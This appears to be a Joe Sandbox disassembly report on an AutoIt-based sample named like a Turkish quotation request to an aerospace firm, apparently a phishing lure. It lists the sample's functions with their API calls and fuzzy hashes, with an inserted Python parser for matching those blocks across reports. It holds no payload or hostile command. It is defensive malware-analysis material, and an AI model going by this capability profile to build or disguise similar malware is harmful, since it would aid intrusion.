                                                                                                                                    • Instruction ID: cb8671629d5c13721a06d3c54322c7c20ea60e8ac1df166889b59cffb00914c6
                                                                                                                                    • Opcode Fuzzy Hash: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
                                                                                                                                    • Instruction Fuzzy Hash: 3121907150034A9BFB319F6DD804AAA77E9AF45720F200A59FDE0D72C0D772A8618B60
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0100AC54
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0100ACA8
                                                                                                                                    • __swprintf.LIBCMT ref: 0100ACC1
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0102F910), ref: 0100ACFF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                    • String ID: %lu
                                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                                    • Opcode ID: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                                                                                    • Instruction ID: c7cb02d55cc12ff263c10eba01beb63b1f47e995571e915328e04faa648ad8e9
                                                                                                                                    • Opcode Fuzzy Hash: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                                                                                    • Instruction Fuzzy Hash: 8F219D70A0020AAFCB20DF65CD45DAF7BB8EF4A714B1040A9F949EB251DA75EA01DB21
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 01001B19
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                                    • Opcode ID: 4d1704c76b5dec7f9d41e78c03ad7befba3f8e938b3559fdd3e2d1b04ae16071
                                                                                                                                    • Instruction ID: 613eb35d8fcfd2867fd70e85ae3036b7ab733731a7c8c6a56b11a7c2b38a0c02
                                                                                                                                    • Opcode Fuzzy Hash: 4d1704c76b5dec7f9d41e78c03ad7befba3f8e938b3559fdd3e2d1b04ae16071
                                                                                                                                    • Instruction Fuzzy Hash: F9115E70900209CF9F41EF64DD529EEB7B4FF16308F108499DCA467296EB3A9906DB50
                                                                                                                                    APIs
                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0101EC07
                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0101EC37
                                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0101ED6A
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0101EDEB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2364364464-0
                                                                                                                                    • Opcode ID: 833dc8c64ff9d35d41ed332ecab786e3c51a5c9eaa73afc82beab45ef85fb59c
                                                                                                                                    • Instruction ID: b06fb78e6a74a559550530f205e25c9d35719386ad36aea14c4c757f5290f5d0
                                                                                                                                    • Opcode Fuzzy Hash: 833dc8c64ff9d35d41ed332ecab786e3c51a5c9eaa73afc82beab45ef85fb59c
                                                                                                                                    • Instruction Fuzzy Hash: AB8170B16043009FD761EF28CC86F2EB7E5AF45750F44882DF999DB292DAB8AC41CB51
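The per-function blocks above (an "APIs" list followed by "Memory Dump Source" and "Similarity" fields) are what a practitioner mines when hunting the same AutoIt stub across samples: the direct API sequence gives a behavioural signature, and the Opcode Fuzzy Hash lets a function be matched in another report without re-disassembling. The parser below is an added example written for this page, not Joe Sandbox code or part of the report; it assumes the block layout seen here (each block opens with an "APIs" heading, subcall lines carry "Part of subcall function"), treats the exporter's trailing "Download File" link text as residue, and uses the standard Win32 PROCESS_* access-mask constants to decode the OpenProcess argument. The sample input is a constructed subset of lines copied verbatim from the blocks above.

```python
"""Parse Joe Sandbox per-function blocks into searchable records (added example,
not Joe Sandbox code). Layout assumed: every function block starts with an
"APIs" heading; bullet lines under other headings are "Key: value" fields."""
import re
from dataclasses import dataclass, field

# Constructed input: lines copied verbatim from this report's blocks,
# indentation trimmed, one "Download File" residue kept on purpose.
SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 01006DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006DEF
• GetStdHandle.KERNEL32(0000000C), ref: 01006E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01006E3B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• Opcode Fuzzy Hash: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010200FD
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01020183
• RegCloseKey.ADVAPI32(00000000), ref: 010201BC
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0101EC07
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0101ED6A
• CloseHandle.KERNEL32(?), ref: 0101EDEB
Similarity
• Opcode Fuzzy Hash: 833dc8c64ff9d35d41ed332ecab786e3c51a5c9eaa73afc82beab45ef85fb59c
"""

# "• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z_]\w*)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*?)$")
RESIDUE = "Download File"  # link text the HTML export glues onto .sdmp names


@dataclass
class ApiCall:
    name: str
    module: str
    args: list            # raw hex strings, or '?' where the sandbox lost the value
    ref: str              # call-site address
    subcall_of: str = None  # callee address for "Part of subcall function" lines


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # key -> list of values

    def get(self, key):
        return self.fields.get(key, [""])[0]


def parse_blocks(text):
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):      # a heading; "APIs" opens a new block
            section = line
            if section == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub, name, mod, args, ref = m.groups()
                cur.apis.append(ApiCall(name, mod, args.split(",") if args else [],
                                        ref.upper(), sub.upper() if sub else None))
        else:
            m = FIELD_RE.match(line)
            if m:
                key, val = m.groups()
                if val.endswith(RESIDUE):
                    val = val[: -len(RESIDUE)].rstrip()
                cur.fields.setdefault(key, []).append(val)
    return blocks


def direct_sequence(block):
    """API names the function calls itself, in call-site order; calls that
    belong to callees ("Part of subcall function") are excluded."""
    return [c.name for c in sorted(block.apis, key=lambda c: int(c.ref, 16))
            if c.subcall_of is None]


def calls_named(blocks, name):
    return [c for b in blocks for c in b.apis if c.name == name]


def index_by_opcode_hash(blocks):
    """Opcode Fuzzy Hash -> direct API sequence, for matching a function in
    another report of the same family without re-disassembling it."""
    return {b.get("Opcode Fuzzy Hash"): direct_sequence(b)
            for b in blocks if b.get("Opcode Fuzzy Hash")}


# Standard Win32 process access rights (winnt.h), lowest bit first.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def decode_process_access(arg):
    """Expand an OpenProcess dwDesiredAccess value into its named bits;
    '?' (argument not recovered by the sandbox) yields an empty list."""
    try:
        mask = int(arg, 16)
    except ValueError:
        return []
    return [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
```

Run on the sample, the OpenProcess block decodes 0x410 to PROCESS_VM_READ and PROCESS_QUERY_INFORMATION, which is exactly the pair GetProcessMemoryInfo needs; the CreatePipe block's direct sequence (GetStdHandle, CreatePipe, GetStdHandle, CreateFileW on `nul`) reads as a standard-handle redirection routine, and the registry block's `_memmove` line is kept but tagged as belonging to the callee at 00FA7DE1 rather than counted in the function's own signature.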
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010200FD
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102013C
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01020183
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 010201AF
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 010201BC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3440857362-0
                                                                                                                                    • Opcode ID: 4611f82eb68c07f2e42fcd1a32b36072b98838b90dfdede43cdde339224f69b9
                                                                                                                                    • Instruction ID: 3e76dd712f2bcad6a2a9602c0c47b8ea55c2ff7d378d359225bd25486366b2f8
                                                                                                                                    • Opcode Fuzzy Hash: 4611f82eb68c07f2e42fcd1a32b36072b98838b90dfdede43cdde339224f69b9
                                                                                                                                    • Instruction Fuzzy Hash: EB516771208305AFD714EF68CC81EABB7E9AF84304F54492DF5898B2A1DB39E904DB52
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101D927
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0101D9AA
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0101D9C6
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0101DA07
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101DA21
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                                                                                      • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 327935632-0
                                                                                                                                    • Opcode ID: a6451ffb7674827a13c76dbf1f3cfb8d63ca7f4d512aad6dbb5013354565f627
                                                                                                                                    • Instruction ID: cc02507f981e4b4026c39040790400c02636d3a4c002e940859b0a6f3d438f3e
                                                                                                                                    • Opcode Fuzzy Hash: a6451ffb7674827a13c76dbf1f3cfb8d63ca7f4d512aad6dbb5013354565f627
                                                                                                                                    • Instruction Fuzzy Hash: C9514D75A04209DFCB10EFA8C8889ADB7F5FF09310B5480A9E855AB312D739ED45CF90
                                                                                                                                    APIs
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0100E61F
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0100E648
                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0100E687
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0100E6AC
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0100E6B4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1389676194-0
                                                                                                                                    • Opcode ID: dec6306a8418a2ceef8b2ac95cac7dd8269562fd61ae782d96045a615c11930d
                                                                                                                                    • Instruction ID: b18f85e0040bea1810062f1b14873571de40588ef574c70d0049ca027da7b59a
                                                                                                                                    • Opcode Fuzzy Hash: dec6306a8418a2ceef8b2ac95cac7dd8269562fd61ae782d96045a615c11930d
                                                                                                                                    • Instruction Fuzzy Hash: 4A516D75A00105DFDB01EF64C981AAEBBF5EF0A310F1480A9E849AB362CB79ED01DF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 019f4cd1bc63c8cb57a3e8a22c76a3a494e5922e9de6f3330648ab7260cb7d44
                                                                                                                                    • Instruction ID: 86d3b495afd07f999d79a4a75610a91bf4f263a9ab1d8cbdb599f11f1fff16b9
                                                                                                                                    • Opcode Fuzzy Hash: 019f4cd1bc63c8cb57a3e8a22c76a3a494e5922e9de6f3330648ab7260cb7d44
                                                                                                                                    • Instruction Fuzzy Hash: F341D635A04124EFD760DE28CC88FA9BFE4EB093A0F240595FA95A76D1CF349941DB50
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA2357
                                                                                                                                    • ScreenToClient.USER32(010657B0,?), ref: 00FA2374
                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00FA2399
                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                    • Opcode ID: 84aaeae9cd3dfeaeb034db5ba7a63b30e71aa7434ca93466ea23b3b32ba5ed6d
                                                                                                                                    • Instruction ID: c17fba3df6f73ff3f0e5d266d8f7356af280121f7d8489b862e79a5a076fd8ad
                                                                                                                                    • Opcode Fuzzy Hash: 84aaeae9cd3dfeaeb034db5ba7a63b30e71aa7434ca93466ea23b3b32ba5ed6d
                                                                                                                                    • Instruction Fuzzy Hash: CF418275A04216FBCF259F68C848AEDBB75FF06370F24431AE86992290C735A950FF91
                                                                                                                                    APIs
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF63E7
                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00FF6433
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00FF645C
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00FF6466
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF6475
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2108273632-0
                                                                                                                                    • Opcode ID: 7eb18e07b990360e296e880a6c0b45a08785996b4529e42a2787130654dfa6c4
                                                                                                                                    • Instruction ID: a4cca79a780bb7eb256d24bff6688ef1863b000907853a038de7f2115fe03d3c
                                                                                                                                    • Opcode Fuzzy Hash: 7eb18e07b990360e296e880a6c0b45a08785996b4529e42a2787130654dfa6c4
                                                                                                                                    • Instruction Fuzzy Hash: 3331A47190024BAFDB34DEB0DC44BB67BB8AF05360F140165E661C31B5EB2A9489F760
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FF8A30
                                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00FF8ADA
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FF8AE2
                                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00FF8AF0
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FF8AF8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                    • Opcode ID: 979eeefc760281c6b393736082df04dc98c36510c0278e931c81adf70d7ab76e
• Instruction ID: 2798de1dd123e797df6398bf4db45c764fe9ea074a0449f8e9a59333c3f2070c
• Opcode Fuzzy Hash: 979eeefc760281c6b393736082df04dc98c36510c0278e931c81adf70d7ab76e
• Instruction Fuzzy Hash: 5731D17190021DEBDB24CF68D94CAAE7BB5EF05365F104219FA25E62E0C7B49911DB90
APIs
• IsWindowVisible.USER32(?), ref: 00FFB204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FFB221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FFB259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FFB27F
• _wcsstr.LIBCMT ref: 00FFB289
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: d0c02cc960b471f8689a70dbc57510f56196097017239e881497d184bd8a70e0
• Instruction ID: 71ae68e068da40715e8b090744fd934a5badbf032306bd915a355973ff91566c
• Opcode Fuzzy Hash: d0c02cc960b471f8689a70dbc57510f56196097017239e881497d184bd8a70e0
• Instruction Fuzzy Hash: 02210332604206AAEB265A35DC09F7F7BACDF49760F10802DF904DA161EF659C41A360
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• GetWindowLongW.USER32(?,000000F0), ref: 0102B192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0102B1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0102B1CF
• GetSystemMetrics.USER32(00000004), ref: 0102B1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01010E90,00000000), ref: 0102B216
Memory Dump Source
